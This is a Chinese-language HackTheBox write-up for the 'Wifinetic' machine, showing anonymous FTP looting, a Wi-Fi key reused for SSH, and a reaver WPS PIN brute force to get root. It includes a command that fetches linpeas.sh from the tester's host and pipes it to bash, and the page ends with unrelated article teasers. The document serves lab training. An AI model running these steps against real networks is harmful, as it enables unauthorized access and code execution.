HackTheBox-Machines--Wifinetic

文章目录

  • 1 端口扫描
  • 2 测试思路
  • 3 21端口测试&权限获取
  • 4 权限提升
    • 方法一
    • 方法二:


Wifinetic 测试过程


1 端口扫描


nmap -sC -sV 10.129.229.90

在这里插入图片描述


2 测试思路


  目标开启了21、22、53端口,并且21端口FTP服务允许匿名登录,所以从21端口开始进行测试。


3 21端口测试&权限获取


    1.ftp匿名访问

ftp 10.129.229.90

在这里插入图片描述

    2.使用get 或者 mget * 命令下载发现的txt及pdf文件

在这里插入图片描述

在这里插入图片描述

    3.解压下载的tar文件,发现存在passwd文件及config配置文件

tar -zxvf backup-OpenWrt-2023-07-26.tar

在这里插入图片描述

    4.查看passwd和config配置文件

cat /etc/passwd
cat/etc/config

   在passwd文件中发现用户名netadmin,在/config/wireless文件中发现option key:VeRyUniUqWiFIPasswrd1!
在这里插入图片描述

在这里插入图片描述
   5.使用netadmin:VeRyUniUqWiFIPasswrd1!进行ssh登录

在这里插入图片描述

4 权限提升

方法一

ifconfig

   发现两个无线接口,但是无法确定wlan0和wlan1哪一个是客户机,哪一个是AP。进一步测试。

在这里插入图片描述

# 检查系统运行的自定义服务
systemctl status wpa_supplicant.service

在这里插入图片描述

# 检查hostpad服务
systemctl status hostapd.service

   确定wlan0为AP接入点
在这里插入图片描述

# 列举无线接口
iwconfig

在这里插入图片描述

# 提供无线网络接口及其配置的详细信息
iw dev

   从输入可知:wlan0为AP接入点,并且和phy 0关联,BSSID值为:02:00:00:00:00:00,信道为1
在这里插入图片描述

#检查预安装工具
getcap -r / 2>/dev/null

在这里插入图片描述

# 使用reaver工具暴力破解WPS PIN
reaver -i mon0 -b 02:00:00:00:00:00 -vv -c 1

在这里插入图片描述

su root
# password
WhatIsRealAnDWhAtIsNot51121!

在这里插入图片描述

方法二:

python3 -m http.server 8000
# 使用linpeas.sh脚本检测可使用的方法及工具,检测到可使用reaver工具,后续步骤如上所示curl http://10.10.14.53:8000/linpeas.sh | bash 

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/589214.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

谈谈考研数学几个常见误区

25考研数学,一定一定要吃透基础,练好计算 我之所以要强调这个,是因为现在的考研数学,越来越重视基础和计算的考察,题海战术已经过时,如果想要有效的提升自己,要进行针对性的学习。我去年考研的…

又一AI工具开源!企业应该如何搭上这趟AI快车

大模型技术在近两年来飞速发展,企业对大模型的认知更加理性、务实。大模型本身不会直接产生价值,但在大模型基础架构之上开发出的AI应用,带来技术创新及业务增长,成为企业真正关心的问题。 基于大模型开发的又一个AI工具诞生&…

VMware虚拟机三种网络模式配置

vmware有三种网络工作模式:Bridged(桥接模式)、NAT(网络地址转换模式)、Host-Only(仅主机模式)。 1. 打开网络编辑器(编辑 --> 虚拟网络编辑器) 在主机上有VMware Ne…

LLMs之DBRX:DBRX的简介、安装和使用方法、案例应用之详细攻略

LLMs之DBRX:DBRX的简介、安装和使用方法、案例应用之详细攻略 导读:2024年3月27日(美国时间),DBRX是Databricks推出的一款新型开源大语言模型,主要特征和优势总结如下: >> 表现优异:DBRX在各类自然语…

vue3的mars3d点击右键出现置顶、向下、向上等选项

效果图 下载插件 imengyu/vue3-context-menu npm i imengyu/vue3-context-menu在要使用的页面中引入一下代码 import "imengyu/vue3-context-menu/lib/vue3-context-menu.css"; import ContextMenu from "imengyu/vue3-context-menu";如果是使用在树的…

课程设计项目2.2:心电信号中的QRS波监测

01.课程设计的主要内容 02.代码效果图 1.差分阈值法进行QRS波检测 2.QRS复波检测算法 获取代码请关注MATLAB科研小白的个人公众号(即文章下方二维码),并回复:MATLAB课程设计本公众号致力于解决找代码难,写代码怵。各位…

填谷式无源PFC电路

目录: 1、概述 2、原理 1、概述 如果不采用PFC,那么典型开关模式电源的功率因数约为0.6,因而会有相当大的奇次谐波失真(第三谐波有时和基本谐波一样大)。令功率因数小于1以及来自峰值负载的谐波减少了运行设备可用的实际功率。为运行这些低…

SRC实战-cookie注入漏洞

谷歌语法-信息收集 1.查找带有ID传参的网站(可以查找sql注入漏洞) inurl:asp idxx 2.查找网站后台(多数有登陆框,可以查找弱口令,暴力破解等漏洞) site:http://xxxx.com “admin” site:http://xx.com int…

Nativefier - 将网页变为软件

Nativefier 是一款命令行工具,可以轻松地为任何网站创建 "桌面应用程序",而无需大费周章。应用程序由 Electron(内核使用 Chromium)封装成操作系统可执行文件(.app、.exe 等),可在 Wi…

同步检查继电器 JT-1/200 100V 面板嵌入式安装,板后接线

系列型号 JT-1同步检查继电器; DT-1同步检查继电器; JT-3同步检查继电器; DT-3同步检查继电器; 一、应用范围 JT(DT)系列同步检查继电器用于两端供电线路的自动重合闸线路中,以检查线路上电压的存在及线路上和变电站汇…

HTTP/1.1、HTTP/2、HTTP/3 演变(计算机网络)

HTTP/1.1 相比 HTTP/1.0 提高了什么性能? HTTP/1.1 相比 HTTP/1.0 性能上的改进: 使用长连接改善了短连接造成的性能开销。支持管道网络传输,只要第一个请求发出去了,不必等其回来,就可以发第二个请求出去&#xff0c…

使用 LLMLingua-2 压缩 GPT-4 和 Claude 提示

原文地址:Compress GPT-4 and Claude prompts with LLMLingua-2 2024 年 4 月 1 日 向大型语言模型(LLM)发送的提示长度越短,推理速度就会越快,成本也会越低。因此,提示压缩已经成为LLM研究的热门领域。 …